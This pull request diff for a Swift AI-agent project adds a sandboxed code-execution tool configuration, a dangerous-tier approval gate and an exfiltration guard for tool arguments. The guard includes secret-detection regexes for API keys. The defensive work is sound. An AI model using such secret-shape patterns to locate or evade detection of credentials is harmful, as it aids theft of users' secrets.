### PR TITLE
Add execute_code sandbox tool and the dangerous-tier approval gate

### DIFF
--- a/.swiftlint.yml
+++ b/.swiftlint.yml
@@ -64,7 +64,7 @@ trailing_semicolon: error
 duplicate_imports: error
 
 identifier_name:
-  excluded: [id, db, ts, ok]
+  excluded: [id, db, ts, ok, sh]
 
 type_name:
   min_length: 3

--- a/Sources/ClawCore/Config/AppConfig.swift
+++ b/Sources/ClawCore/Config/AppConfig.swift
@@ -1,139 +1,5 @@
 import Foundation
 
-public struct PinnedImageReference: Sendable, Equatable, CustomStringConvertible {
-  public let repository: String
-  public let digest: String
-
-  public var registryHost: String {
-    String(repository.split(separator: "/", maxSplits: 1)[0]).lowercased()
-  }
-
-  public var description: String {
-    "\(repository)@sha256:\(digest)"
-  }
-
-  public static func parse(_ rawValue: String) -> PinnedImageReference? {
-    guard rawValue == rawValue.trimmingCharacters(in: .whitespacesAndNewlines) else {
-      return nil
-    }
-    guard rawValue.contains("://") == false else {
-      return nil
-    }
-    guard let separator = rawValue.range(of: "@sha256:") else {
-      return nil
-    }
-    guard
-      rawValue.range(
-        of: "@sha256:",
-        range: separator.upperBound..<rawValue.endIndex
-      ) == nil
-    else {
-      return nil
-    }
-
-    let repository = String(rawValue[..<separator.lowerBound])
-    let digest = String(rawValue[separator.upperBound...])
-    guard digest.count == 64, digest.allSatisfy({ "0123456789abcdef".contains($0) }) else {
-      return nil
-    }
-
-    let components = repository.split(separator: "/", omittingEmptySubsequences: false)
-    guard components.count >= 2 else {
-      return nil
-    }
-    let registry = String(components[0])
-    guard isValidRegistryHost(registry) else {
-      return nil
-    }
-    let repositoryComponents = components.dropFirst().map(String.init)
-    guard repositoryComponents.allSatisfy(isValidRepositoryComponent) else {
-      return nil
-    }
-
-    return PinnedImageReference(repository: repository, digest: digest)
-  }
-
-  static func isValidRegistryHost(_ rawHost: String) -> Bool {
-    guard rawHost == rawHost.lowercased(), rawHost.isEmpty == false else {
-      return false
-    }
-
-    let pieces = rawHost.split(separator: ":", omittingEmptySubsequences: false)
-    guard pieces.count <= 2 else {
-      return false
-    }
-
-    if pieces.count == 2 {
-      let rawPort = pieces[1]
-      guard
-        rawPort.isEmpty == false,
-        rawPort.allSatisfy({ "0123456789".contains($0) }),
-        let port = Int(rawPort),
-        (1...65_535).contains(port)
-      else {
-        return false
-      }
-    }
-
-    let hostname = String(pieces[0])
-    guard hostname != "localhost", hostname.contains("."), hostname.contains("[") == false else {
-      return false
-    }
-
-    let labels = hostname.split(separator: ".", omittingEmptySubsequences: false)
-    guard labels.allSatisfy(isValidDNSLabel) else {
-      return false
-    }
-    guard labels.allSatisfy({ Int($0) != nil }) == false else {
-      return false
-    }
-
-    return true
-  }
-}
-
-// MARK: - Image Reference Validation
-
-private extension PinnedImageReference {
-  static func isValidDNSLabel(_ label: Substring) -> Bool {
-    guard (1...63).contains(label.count), label.first != "-", label.last != "-" else {
-      return false
-    }
-    return label.allSatisfy { character in
-      "abcdefghijklmnopqrstuvwxyz0123456789-".contains(character)
-    }
-  }
-
-  static func isValidRepositoryComponent(_ component: String) -> Bool {
-    guard component.isEmpty == false, component != ".", component != ".." else {
-      return false
-    }
-    return component.allSatisfy { character in
-      "abcdefghijklmnopqrstuvwxyz0123456789._-".contains(character)
-    }
-  }
-}
-
-public struct ExecConfig: Sendable, Equatable {
-  public let enabled: Bool
-  public let image: PinnedImageReference?
-  public let imageRegistryAllowlist: [String]
-  public let memoryMiB: Int
-  public let cpus: Int
-  public let timeoutSeconds: Int
-  public let allowEgress: Bool
-
-  public static let disabledDefault = ExecConfig(
-    enabled: false,
-    image: nil,
-    imageRegistryAllowlist: ["cgr.dev"],
-    memoryMiB: 1024,
-    cpus: 4,
-    timeoutSeconds: 30,
-    allowEgress: false
-  )
-}
-
 public struct AppConfig: Sendable, Equatable {
   public enum EnvKey {
     static let allowlist = "CLAW_ALLOWLIST"
@@ -176,7 +42,7 @@ public struct AppConfig: Sendable, Equatable {
     static let execAllowEgress = "CLAW_EXEC_ALLOW_EGRESS"
   }
 
-  private enum EnvDefaults {
+  enum EnvDefaults {
     static let pollTimeoutSeconds = 30
     static let stateDirectoryName = ".swift-claw"
     static let maxTokensField = MaxTokensField.maxCompletionTokens
@@ -550,7 +416,7 @@ private extension AppConfig {
 
 // MARK: - Generic Value Parsing
 
-private extension AppConfig {
+extension AppConfig {
   static func boolValue(
     _ raw: String?,
     key: String,
@@ -668,114 +534,6 @@ private extension AppConfig {
       throw ConfigError.invalidApprovalExpiry(trimmed)
     }
 
-    return value
-  }
-}
-
-// MARK: - Execution Parsing
-
-private extension AppConfig {
-  static func parseExecConfig(from env: [String: String]) throws -> ExecConfig {
-    let enabled = try boolValue(
-      env[EnvKey.execEnabled],
-      key: EnvKey.execEnabled,
-      default: false
-    )
-
-    let registryAllowlist = try parseExecRegistryAllowlist(env[EnvKey.execImageRegistries])
-
-    let rawImage = env[EnvKey.execImage] ?? ""
-    let image: PinnedImageReference?
-    if rawImage.isEmpty {
-      image = nil
-    } else {
-      guard let parsed = PinnedImageReference.parse(rawImage) else {
-        throw ConfigError.invalidExecImage(rawImage)
-      }
-      guard registryAllowlist.contains(parsed.registryHost) else {
-        throw ConfigError.execImageRegistryNotAllowed(parsed.registryHost)
-      }
-      image = parsed
-    }
-
-    if enabled, image == nil {
-      throw ConfigError.invalidExecImage(rawImage)
-    }
-
-    let memoryMiB = try boundedExecInt(
-      env[EnvKey.execMemoryMiB],
-      default: EnvDefaults.execMemoryMiB,
-      range: 256...8192,
-      error: ConfigError.invalidExecMemoryMiB
-    )
-
-    let cpus = try boundedExecInt(
-      env[EnvKey.execCPUs],
-      default: EnvDefaults.execCPUs,
-      range: 1...Int.max,
-      error: ConfigError.invalidExecCPUs
-    )
-    if enabled, cpus > ProcessInfo.processInfo.activeProcessorCount {
-      throw ConfigError.invalidExecCPUs("\(cpus)")
-    }
-
-    let timeoutSeconds = try boundedExecInt(
-      env[EnvKey.execTimeout],
-      default: EnvDefaults.execTimeoutSeconds,
-      range: 1...300,
-      error: ConfigError.invalidExecTimeout
-    )
-
-    let allowEgress = try boolValue(
-      env[EnvKey.execAllowEgress],
-      key: EnvKey.execAllowEgress,
-      default: false
-    )
-
-    return ExecConfig(
-      enabled: enabled,
-      image: image,
-      imageRegistryAllowlist: registryAllowlist,
-      memoryMiB: memoryMiB,
-      cpus: cpus,
-      timeoutSeconds: timeoutSeconds,
-      allowEgress: allowEgress
-    )
-  }
-
-  static func parseExecRegistryAllowlist(_ rawValue: String?) throws -> [String] {
-    guard let rawValue else {
-      return EnvDefaults.execImageRegistries
-    }
-    let trimmed = rawValue.trimmingCharacters(in: .whitespacesAndNewlines)
-    guard trimmed.isEmpty == false else {
-      throw ConfigError.invalidExecImageRegistry(rawValue)
-    }
-
-    let hosts = trimmed.split(separator: ",", omittingEmptySubsequences: false).map { part in
-      part.trimmingCharacters(in: .whitespacesAndNewlines).lowercased()
-    }
-    guard hosts.isEmpty == false,
-      hosts.allSatisfy(PinnedImageReference.isValidRegistryHost)
-    else {
-      throw ConfigError.invalidExecImageRegistry(rawValue)
-    }
-    return Array(Set(hosts)).sorted()
-  }
-
-  static func boundedExecInt(
-    _ rawValue: String?,
-    default fallback: Int,
-    range: ClosedRange<Int>,
-    error: (String) -> ConfigError
-  ) throws -> Int {
-    let trimmed = rawValue?.trimmingCharacters(in: .whitespacesAndNewlines) ?? ""
-    guard trimmed.isEmpty == false else {
-      return fallback
-    }
-    guard let value = Int(trimmed), range.contains(value) else {
-      throw error(trimmed)
-    }
     return value
   }
 }

--- a/Sources/ClawCore/Config/ExecConfig.swift
+++ b/Sources/ClawCore/Config/ExecConfig.swift
@@ -222,6 +222,7 @@ extension AppConfig {
     else {
       throw ConfigError.invalidExecImageRegistry(rawValue)
     }
+
     return Array(Set(hosts)).sorted()
   }
 
@@ -235,9 +236,11 @@ extension AppConfig {
     guard trimmed.isEmpty == false else {
       return fallback
     }
+
     guard let value = Int(trimmed), range.contains(value) else {
       throw error(trimmed)
     }
+
     return value
   }
 }

--- a/Sources/ClawCore/Config/ExecConfig.swift
+++ b/Sources/ClawCore/Config/ExecConfig.swift
@@ -1,0 +1,243 @@
+import Foundation
+
+public struct PinnedImageReference: Sendable, Equatable, CustomStringConvertible {
+  public let repository: String
+  public let digest: String
+
+  public var registryHost: String {
+    String(repository.split(separator: "/", maxSplits: 1)[0]).lowercased()
+  }
+
+  public var description: String {
+    "\(repository)@sha256:\(digest)"
+  }
+
+  public static func parse(_ rawValue: String) -> PinnedImageReference? {
+    guard rawValue == rawValue.trimmingCharacters(in: .whitespacesAndNewlines) else {
+      return nil
+    }
+    guard rawValue.contains("://") == false else {
+      return nil
+    }
+    guard let separator = rawValue.range(of: "@sha256:") else {
+      return nil
+    }
+    guard
+      rawValue.range(
+        of: "@sha256:",
+        range: separator.upperBound..<rawValue.endIndex
+      ) == nil
+    else {
+      return nil
+    }
+
+    let repository = String(rawValue[..<separator.lowerBound])
+    let digest = String(rawValue[separator.upperBound...])
+    guard digest.count == 64, digest.allSatisfy({ "0123456789abcdef".contains($0) }) else {
+      return nil
+    }
+
+    let components = repository.split(separator: "/", omittingEmptySubsequences: false)
+    guard components.count >= 2 else {
+      return nil
+    }
+    let registry = String(components[0])
+    guard isValidRegistryHost(registry) else {
+      return nil
+    }
+    let repositoryComponents = components.dropFirst().map(String.init)
+    guard repositoryComponents.allSatisfy(isValidRepositoryComponent) else {
+      return nil
+    }
+
+    return PinnedImageReference(repository: repository, digest: digest)
+  }
+
+  static func isValidRegistryHost(_ rawHost: String) -> Bool {
+    guard rawHost == rawHost.lowercased(), rawHost.isEmpty == false else {
+      return false
+    }
+
+    let pieces = rawHost.split(separator: ":", omittingEmptySubsequences: false)
+    guard pieces.count <= 2 else {
+      return false
+    }
+
+    if pieces.count == 2 {
+      let rawPort = pieces[1]
+      guard
+        rawPort.isEmpty == false,
+        rawPort.allSatisfy({ "0123456789".contains($0) }),
+        let port = Int(rawPort),
+        (1...65_535).contains(port)
+      else {
+        return false
+      }
+    }
+
+    let hostname = String(pieces[0])
+    guard hostname != "localhost", hostname.contains("."), hostname.contains("[") == false else {
+      return false
+    }
+
+    let labels = hostname.split(separator: ".", omittingEmptySubsequences: false)
+    guard labels.allSatisfy(isValidDNSLabel) else {
+      return false
+    }
+    guard labels.allSatisfy({ Int($0) != nil }) == false else {
+      return false
+    }
+
+    return true
+  }
+}
+
+// MARK: - Image Reference Validation
+
+private extension PinnedImageReference {
+  static func isValidDNSLabel(_ label: Substring) -> Bool {
+    guard (1...63).contains(label.count), label.first != "-", label.last != "-" else {
+      return false
+    }
+    return label.allSatisfy { character in
+      "abcdefghijklmnopqrstuvwxyz0123456789-".contains(character)
+    }
+  }
+
+  static func isValidRepositoryComponent(_ component: String) -> Bool {
+    guard component.isEmpty == false, component != ".", component != ".." else {
+      return false
+    }
+    return component.allSatisfy { character in
+      "abcdefghijklmnopqrstuvwxyz0123456789._-".contains(character)
+    }
+  }
+}
+
+public struct ExecConfig: Sendable, Equatable {
+  public let enabled: Bool
+  public let image: PinnedImageReference?
+  public let imageRegistryAllowlist: [String]
+  public let memoryMiB: Int
+  public let cpus: Int
+  public let timeoutSeconds: Int
+  public let allowEgress: Bool
+
+  public static let disabledDefault = ExecConfig(
+    enabled: false,
+    image: nil,
+    imageRegistryAllowlist: ["cgr.dev"],
+    memoryMiB: 1024,
+    cpus: 4,
+    timeoutSeconds: 30,
+    allowEgress: false
+  )
+}
+
+// MARK: - Execution Parsing
+
+extension AppConfig {
+  static func parseExecConfig(from env: [String: String]) throws -> ExecConfig {
+    let enabled = try boolValue(
+      env[EnvKey.execEnabled],
+      key: EnvKey.execEnabled,
+      default: false
+    )
+
+    let registryAllowlist = try parseExecRegistryAllowlist(env[EnvKey.execImageRegistries])
+
+    let rawImage = env[EnvKey.execImage] ?? ""
+    let image: PinnedImageReference?
+    if rawImage.isEmpty {
+      image = nil
+    } else {
+      guard let parsed = PinnedImageReference.parse(rawImage) else {
+        throw ConfigError.invalidExecImage(rawImage)
+      }
+      guard registryAllowlist.contains(parsed.registryHost) else {
+        throw ConfigError.execImageRegistryNotAllowed(parsed.registryHost)
+      }
+      image = parsed
+    }
+
+    if enabled, image == nil {
+      throw ConfigError.invalidExecImage(rawImage)
+    }
+
+    let memoryMiB = try boundedExecInt(
+      env[EnvKey.execMemoryMiB],
+      default: EnvDefaults.execMemoryMiB,
+      range: 256...8192,
+      error: ConfigError.invalidExecMemoryMiB
+    )
+
+    let cpus = try boundedExecInt(
+      env[EnvKey.execCPUs],
+      default: EnvDefaults.execCPUs,
+      range: 1...Int.max,
+      error: ConfigError.invalidExecCPUs
+    )
+    if enabled, cpus > ProcessInfo.processInfo.activeProcessorCount {
+      throw ConfigError.invalidExecCPUs("\(cpus)")
+    }
+
+    let timeoutSeconds = try boundedExecInt(
+      env[EnvKey.execTimeout],
+      default: EnvDefaults.execTimeoutSeconds,
+      range: 1...300,
+      error: ConfigError.invalidExecTimeout
+    )
+
+    let allowEgress = try boolValue(
+      env[EnvKey.execAllowEgress],
+      key: EnvKey.execAllowEgress,
+      default: false
+    )
+
+    return ExecConfig(
+      enabled: enabled,
+      image: image,
+      imageRegistryAllowlist: registryAllowlist,
+      memoryMiB: memoryMiB,
+      cpus: cpus,
+      timeoutSeconds: timeoutSeconds,
+      allowEgress: allowEgress
+    )
+  }
+
+  private static func parseExecRegistryAllowlist(_ rawValue: String?) throws -> [String] {
+    guard let rawValue else {
+      return EnvDefaults.execImageRegistries
+    }
+    let trimmed = rawValue.trimmingCharacters(in: .whitespacesAndNewlines)
+    guard trimmed.isEmpty == false else {
+      throw ConfigError.invalidExecImageRegistry(rawValue)
+    }
+
+    let hosts = trimmed.split(separator: ",", omittingEmptySubsequences: false).map { part in
+      part.trimmingCharacters(in: .whitespacesAndNewlines).lowercased()
+    }
+    guard hosts.isEmpty == false,
+      hosts.allSatisfy(PinnedImageReference.isValidRegistryHost)
+    else {
+      throw ConfigError.invalidExecImageRegistry(rawValue)
+    }
+    return Array(Set(hosts)).sorted()
+  }
+
+  private static func boundedExecInt(
+    _ rawValue: String?,
+    default fallback: Int,
+    range: ClosedRange<Int>,
+    error: (String) -> ConfigError
+  ) throws -> Int {
+    let trimmed = rawValue?.trimmingCharacters(in: .whitespacesAndNewlines) ?? ""
+    guard trimmed.isEmpty == false else {
+      return fallback
+    }
+    guard let value = Int(trimmed), range.contains(value) else {
+      throw error(trimmed)
+    }
+    return value
+  }
+}

--- a/Sources/ClawCore/Domain/Policy/PolicyFingerprint.swift
+++ b/Sources/ClawCore/Domain/Policy/PolicyFingerprint.swift
@@ -26,26 +26,46 @@ public enum PolicyFingerprint {
     }.joined()
   }
 
-  /// The static inputs: the tool-registry surface (sorted by name — each tool contributes
-  /// name, canonical `.sortedKeys` parameter JSON, `riskLevel.rawValue`, and the egress label),
-  /// then the llm base URL, the search-endpoint presence, the canonical workspace root, the
-  /// web_fetch SSRF exemption list, and the normalized exec block (enabled state, pinned image,
-  /// sorted registry allowlist, caps, timeout, and egress switch). Sorted lists mean config
-  /// order cannot move the hash; a change to any egress-policy input voids an outstanding
-  /// approval. Computed once at the composition root and injected into `ContextBuilder`.
-  public static func staticSubhash(
-    tools: [ToolDefinition],
-    llmBaseURL: String,
-    searchEndpointPresent: Bool,
-    workspaceRoot: String,
-    webFetchExemptCIDRs: [CIDR],
-    exec: ExecConfig
-  ) -> String {
+  /// The policy-relevant surface the static sub-hash is computed over: the tool-registry surface,
+  /// the llm base URL, the search-endpoint presence, the canonical workspace root, the web_fetch
+  /// SSRF exemption list, and the exec block. Secret values are never included.
+  public struct StaticInputs: Sendable {
+    public let tools: [ToolDefinition]
+    public let llmBaseURL: String
+    public let searchEndpointPresent: Bool
+    public let workspaceRoot: String
+    public let webFetchExemptCIDRs: [CIDR]
+    public let exec: ExecConfig
+
+    public init(
+      tools: [ToolDefinition],
+      llmBaseURL: String,
+      searchEndpointPresent: Bool,
+      workspaceRoot: String,
+      webFetchExemptCIDRs: [CIDR],
+      exec: ExecConfig
+    ) {
+      self.tools = tools
+      self.llmBaseURL = llmBaseURL
+      self.searchEndpointPresent = searchEndpointPresent
+      self.workspaceRoot = workspaceRoot
+      self.webFetchExemptCIDRs = webFetchExemptCIDRs
+      self.exec = exec
+    }
+  }
+
+  /// Hashes the static inputs: the tool surface sorted by name (each tool contributes name,
+  /// canonical `.sortedKeys` parameter JSON, `riskLevel.rawValue`, and the egress label), then the
+  /// remaining config identity with the exec block normalized (enabled state, pinned image, sorted
+  /// registry allowlist, caps, timeout, and egress switch). Sorted lists mean config order cannot
+  /// move the hash; a change to any egress-policy input voids an outstanding approval. Computed
+  /// once at the composition root and injected into `ContextBuilder`.
+  public static func staticSubhash(inputs: StaticInputs) -> String {
     let encoder = JSONEncoder()
     encoder.outputFormatting = [.sortedKeys]
 
     var parts: [String] = []
-    for tool in tools.sorted(by: { lhs, rhs in lhs.name < rhs.name }) {
+    for tool in inputs.tools.sorted(by: { lhs, rhs in lhs.name < rhs.name }) {
       // JSONValue encoding cannot realistically fail for the finite case set; tool name still
       // distinguishes entries. JSONEncoder output is always valid UTF-8, so the failable decode
       // preserves the byte-exact contribution and folds to "" only on the same encode failure.
@@ -59,11 +79,12 @@ public enum PolicyFingerprint {
       parts.append(tool.riskLevel.rawValue)
       parts.append(egressLabel(tool.egressClass))
     }
-    parts.append(llmBaseURL)
-    parts.append(searchEndpointPresent ? "search:present" : "search:absent")
-    parts.append(workspaceRoot)
-    let exemptLabel = webFetchExemptCIDRs.map(\.description).sorted().joined(separator: ",")
+    parts.append(inputs.llmBaseURL)
+    parts.append(inputs.searchEndpointPresent ? "search:present" : "search:absent")
+    parts.append(inputs.workspaceRoot)
+    let exemptLabel = inputs.webFetchExemptCIDRs.map(\.description).sorted().joined(separator: ",")
     parts.append("webfetch_exempt:" + exemptLabel)
+    let exec = inputs.exec
     parts.append("exec.enabled:\(exec.enabled)")
     parts.append("exec.image:\(exec.image?.description ?? "absent")")
     parts.append(

--- a/Sources/ClawCore/Domain/Tools/ToolApproval.swift
+++ b/Sources/ClawCore/Domain/Tools/ToolApproval.swift
@@ -21,6 +21,7 @@ public struct ToolAction: Sendable, Equatable {
 public enum ApprovalReason: String, Sendable, Equatable {
   case exfilTrifecta = "exfil_trifecta"
   case askTier = "ask_tier"
+  case codeExec = "code_exec"
 }
 
 /// The tool-specific prompt inputs, produced at gate time by the tool that will act. The gate
@@ -29,7 +30,8 @@ public enum ApprovalReason: String, Sendable, Equatable {
 public struct ToolApprovalPresentation: Sendable, Equatable {
   /// e.g. "create, 1.2 KB" / "overwrite, 340 B" / "egress to <host>".
   public let blastRadius: String
-  /// Size-capped, secret-redacted; nil for non-write tools.
+  /// Tool-authored and exact-secret-redacted; write tools cap their preview, while code execution
+  /// renders its complete 16 KiB-bounded script. Nil for tools with no preview.
   public let contentPreview: String?
   /// `memory_write` scan warnings; empty otherwise.
   public let warnings: [String]
@@ -39,6 +41,35 @@ public struct ToolApprovalPresentation: Sendable, Equatable {
     self.contentPreview = contentPreview
     self.warnings = warnings
   }
+}
+
+/// Everything a dangerous-tier approval binds, produced by the tool at gate time. The canonical
+/// JSON REPLACES the model's raw arguments for hashing, persistence, and approved execution.
+public struct PreparedToolAction: Sendable, Equatable {
+  public let canonicalTarget: String
+  public let canonicalArgsJSON: String
+  public let presentation: ToolApprovalPresentation
+  public let guardTexts: [String]
+  public let canExfiltrate: Bool
+
+  public init(
+    canonicalTarget: String,
+    canonicalArgsJSON: String,
+    presentation: ToolApprovalPresentation,
+    guardTexts: [String],
+    canExfiltrate: Bool
+  ) {
+    self.canonicalTarget = canonicalTarget
+    self.canonicalArgsJSON = canonicalArgsJSON
+    self.presentation = presentation
+    self.guardTexts = guardTexts
+    self.canExfiltrate = canExfiltrate
+  }
+}
+
+public enum PreparedActionResolution: Sendable, Equatable {
+  case prepared(PreparedToolAction)
+  case refused(reason: String)
 }
 
 /// Everything the suspend commit records and the approval binds to. The recorded canonical

--- a/Sources/ClawCore/Domain/Tools/ToolContracts.swift
+++ b/Sources/ClawCore/Domain/Tools/ToolContracts.swift
@@ -262,6 +262,10 @@ public protocol Tool: Sendable {
   /// every tool decides explicitly.
   func canonicalTarget(arguments: JSONValue) -> CanonicalTargetResolution?
 
+  /// Resolves everything a dangerous approval must bind. The default nil is correct for safe and
+  /// ask-tier tools; the gate fails closed when a dangerous tool returns nil.
+  func prepareAction(arguments: JSONValue) async -> PreparedActionResolution?
+
   /// `canonicalTarget` is the gate-resolved form for `.arbitraryDestination` tools — act on
   /// exactly what was authorized, never re-derive it; `nil` for the other classes.
   func execute(arguments: JSONValue, canonicalTarget: String?) async -> ToolPayload
@@ -276,6 +280,10 @@ public protocol Tool: Sendable {
 }
 
 extension Tool {
+  public func prepareAction(arguments: JSONValue) async -> PreparedActionResolution? {
+    nil
+  }
+
   public func approvalPresentation(
     arguments: JSONValue,
     canonicalTarget: String

--- a/Sources/ClawData/Stores/Bot/CommandStoreGRDB.swift
+++ b/Sources/ClawData/Stores/Bot/CommandStoreGRDB.swift
@@ -5,6 +5,7 @@ import GRDB
 public struct CommandStoreGRDB: CommandStore {
   private let database: MappedDatabase
   private let afterClaimForTesting: @Sendable () throws -> Void
+  private let afterSupersedeAndDetaintForTesting: @Sendable () throws -> Void
 
   public init(writer: any DatabaseWriter) {
     self.init(writer: writer, afterClaimForTesting: {})
@@ -12,10 +13,12 @@ public struct CommandStoreGRDB: CommandStore {
 
   init(
     writer: any DatabaseWriter,
-    afterClaimForTesting: @Sendable @escaping () throws -> Void
+    afterClaimForTesting: @Sendable @escaping () throws -> Void = {},
+    afterSupersedeAndDetaintForTesting: @Sendable @escaping () throws -> Void = {}
   ) {
     database = MappedDatabase(writer: writer)
     self.afterClaimForTesting = afterClaimForTesting
+    self.afterSupersedeAndDetaintForTesting = afterSupersedeAndDetaintForTesting
   }
 
   public func applyStop(
@@ -126,6 +129,9 @@ public struct CommandStoreGRDB: CommandStore {
       )
 
       try SessionMessageStoreGRDB.resetWindowAndDetaint(db, sessionId: sessionId, now: now)
+
+      try afterSupersedeAndDetaintForTesting()
+
       try Self.insertNewAudits(db, sessionId: sessionId, runIds: supersededRunIds, now: now)
 
       return NewCommandResult(

--- a/Sources/ClawGateway/Response/ToolApprovalPrompt.swift
+++ b/Sources/ClawGateway/Response/ToolApprovalPrompt.swift
@@ -24,7 +24,7 @@ public enum ToolApprovalPrompt {
   }
 
   /// The durable-approval prompt: a reason-keyed headline, the taint banner, the
-  /// fully-resolved target, blast radius, the privileged-file banner, a size-capped
+  /// fully-resolved target, blast radius, the privileged-file banner, the tool-authored
   /// secret-redacted preview, and scan warnings — assembled in a fixed order so the owner can
   /// judge risk at a glance.
   public static func text(for input: Input) -> String {
@@ -92,6 +92,8 @@ private extension ToolApprovalPrompt {
       "⚠ I want to run \(tool). This changes state and needs your explicit approval."
     case .exfilTrifecta:
       "⚠ I want to run \(tool) while this session holds private data after reading external content."
+    case .codeExec:
+      "⚠ I want to run \(tool) in a disposable sandbox. Review the complete script and staged inputs before approving."
     }
   }
 }

--- a/Sources/ClawTools/Policy/ExfilArgGuard.swift
+++ b/Sources/ClawTools/Policy/ExfilArgGuard.swift
@@ -8,6 +8,53 @@ public struct ExfilArgGuard: Sendable {
     public let redactedArgs: String
   }
 
+  public struct PrivateTextIndex: Sendable {
+    private let windowsByFingerprint: [UInt64: [[Character]]]
+
+    public init(texts: [String]) {
+      let width = ExfilArgGuard.substringThresholdGraphemes
+      var indexed: [UInt64: [[Character]]] = [:]
+
+      for text in texts {
+        let characters = Array(text.precomposedStringWithCanonicalMapping)
+        guard characters.count >= width else {
+          continue
+        }
+
+        for start in 0...(characters.count - width) {
+          let window = Array(characters[start..<(start + width)])
+          indexed[ExfilArgGuard.windowFingerprint(window), default: []].append(window)
+        }
+      }
+
+      windowsByFingerprint = indexed
+    }
+
+    fileprivate func firstMatch(in text: String) -> String? {
+      let width = ExfilArgGuard.substringThresholdGraphemes
+      let characters = Array(text.precomposedStringWithCanonicalMapping)
+      guard characters.count >= width else {
+        return nil
+      }
+
+      for start in 0...(characters.count - width) {
+        let candidate = characters[start..<(start + width)]
+        let fingerprint = ExfilArgGuard.windowFingerprint(candidate)
+        guard let sourceWindows = windowsByFingerprint[fingerprint] else {
+          continue
+        }
+        let matched = sourceWindows.contains { source in
+          candidate.elementsEqual(source)
+        }
+        if matched {
+          return String(candidate)
+        }
+      }
+
+      return nil
+    }
+  }
+
   /// Tier 2 — the pinned v1 secret-shape table. Order matters: first match names the rule.
   static let shapePatterns: [(rule: String, pattern: String)] = [
     ("openai-key", "sk-[A-Za-z0-9_-]{16,}"),
@@ -32,11 +79,15 @@ public struct ExfilArgGuard: Sendable {
   // MARK: - Tiers 1 + 2 (always)
 
   public func evaluateUnconditional(argsJSON: String) -> Verdict {
-    let candidates = Self.matchCandidates(argsJSON)
+    evaluate(text: argsJSON)
+  }
+
+  public func evaluate(text: String) -> Verdict {
+    let candidates = Self.matchCandidates(text)
 
     for candidate in candidates {
       for secret in secretValues where candidate.contains(secret) {
-        return blockedVerdict(rule: "secret-value", raw: argsJSON, spans: [secret])
+        return blockedVerdict(rule: "secret-value", raw: text, spans: [secret])
       }
     }
 
@@ -46,39 +97,35 @@ public struct ExfilArgGuard: Sendable {
           rule != "high-entropy" || Self.looksHighEntropy(match)
         }
         if matches.isEmpty == false {
-          return blockedVerdict(rule: rule, raw: argsJSON, spans: matches)
+          return blockedVerdict(rule: rule, raw: text, spans: matches)
         }
       }
     }
 
-    return Verdict(blockedRule: nil, redactedArgs: renderRedacted(argsJSON: argsJSON))
+    return Verdict(blockedRule: nil, redactedArgs: renderRedacted(argsJSON: text))
   }
 
   // MARK: - Tier 3 (trifecta condition only)
 
   public func evaluateConditional(argsJSON: String, privateFileTexts: [String]) -> Verdict {
-    let threshold = Self.substringThresholdGraphemes
-    let normalizedFiles = privateFileTexts.map { text in
-      text.precomposedStringWithCanonicalMapping
-    }
+    evaluateConditional(
+      text: argsJSON,
+      index: PrivateTextIndex(texts: privateFileTexts)
+    )
+  }
 
-    for candidate in Self.matchCandidates(argsJSON) {
-      let normalizedCandidate = candidate.precomposedStringWithCanonicalMapping
-      let graphemes = Array(normalizedCandidate)
-
-      guard graphemes.count >= threshold else {
-        continue
-      }
-
-      for start in 0...(graphemes.count - threshold) {
-        let window = String(graphemes[start..<(start + threshold)])
-        if normalizedFiles.contains(where: { fileText in fileText.contains(window) }) {
-          return blockedVerdict(rule: "private-file-substring", raw: argsJSON, spans: [window])
-        }
+  public func evaluateConditional(text: String, index: PrivateTextIndex) -> Verdict {
+    for candidate in Self.matchCandidates(text) {
+      if let window = index.firstMatch(in: candidate) {
+        return blockedVerdict(
+          rule: "private-file-substring",
+          raw: text,
+          spans: [window]
+        )
       }
     }
 
-    return Verdict(blockedRule: nil, redactedArgs: renderRedacted(argsJSON: argsJSON))
+    return Verdict(blockedRule: nil, redactedArgs: renderRedacted(argsJSON: text))
   }
 
   // MARK: - Audit rendering
@@ -204,6 +251,27 @@ public struct ExfilArgGuard: Sendable {
     token.contains(where: \.isNumber)
       && token.contains(where: \.isUppercase)
       && token.contains(where: \.isLowercase)
+  }
+
+  /// A collision-tolerant FNV-1a hash over a grapheme window's UTF-8 bytes, with a byte that
+  /// cannot occur in valid UTF-8 mixed in between graphemes so that different grapheme boundaries
+  /// can never fold into the same byte stream. It only narrows the candidate set — callers must
+  /// still confirm exact `Character` equality before blocking, so a collision cannot false-block.
+  static func windowFingerprint<Characters: Collection>(_ characters: Characters) -> UInt64
+  where Characters.Element == Character {
+    var fingerprint: UInt64 = 0xcbf2_9ce4_8422_2325
+    let prime: UInt64 = 0x0000_0100_0000_01b3
+
+    for character in characters {
+      for byte in String(character).utf8 {
+        fingerprint ^= UInt64(byte)
+        fingerprint = fingerprint &* prime
+      }
+      fingerprint ^= 0xff
+      fingerprint = fingerprint &* prime
+    }
+
+    return fingerprint
   }
 
   /// Runs a full redaction sweep over the RAW string so a span only present in a decoded candidate

--- a/Sources/ClawTools/Policy/ExfilArgGuard.swift
+++ b/Sources/ClawTools/Policy/ExfilArgGuard.swift
@@ -235,13 +235,13 @@ public struct ExfilArgGuard: Sendable {
   private static func hexNibble(_ scalar: Unicode.Scalar) -> UInt8? {
     switch scalar {
     case "0"..."9":
-      return UInt8(scalar.value - Unicode.Scalar("0").value)
+      UInt8(scalar.value - Unicode.Scalar("0").value)
     case "a"..."f":
-      return UInt8(scalar.value - Unicode.Scalar("a").value + 10)
+      UInt8(scalar.value - Unicode.Scalar("a").value + 10)
     case "A"..."F":
-      return UInt8(scalar.value - Unicode.Scalar("A").value + 10)
+      UInt8(scalar.value - Unicode.Scalar("A").value + 10)
     default:
-      return nil
+      nil
     }
   }
 
@@ -275,8 +275,9 @@ public struct ExfilArgGuard: Sendable {
   /// cannot occur in valid UTF-8 mixed in between graphemes so that different grapheme boundaries
   /// can never fold into the same byte stream. It only narrows the candidate set — callers must
   /// still confirm exact `Character` equality before blocking, so a collision cannot false-block.
-  static func windowFingerprint<Characters: Collection>(_ characters: Characters) -> UInt64
-  where Characters.Element == Character {
+  static func windowFingerprint<Characters: Collection>(
+    _ characters: Characters
+  ) -> UInt64 where Characters.Element == Character {
     var fingerprint: UInt64 = 0xcbf2_9ce4_8422_2325
     let prime: UInt64 = 0x0000_0100_0000_01b3
 

--- a/Sources/ClawTools/Policy/ExfilArgGuard.swift
+++ b/Sources/ClawTools/Policy/ExfilArgGuard.swift
@@ -9,11 +9,22 @@ public struct ExfilArgGuard: Sendable {
   }
 
   public struct PrivateTextIndex: Sendable {
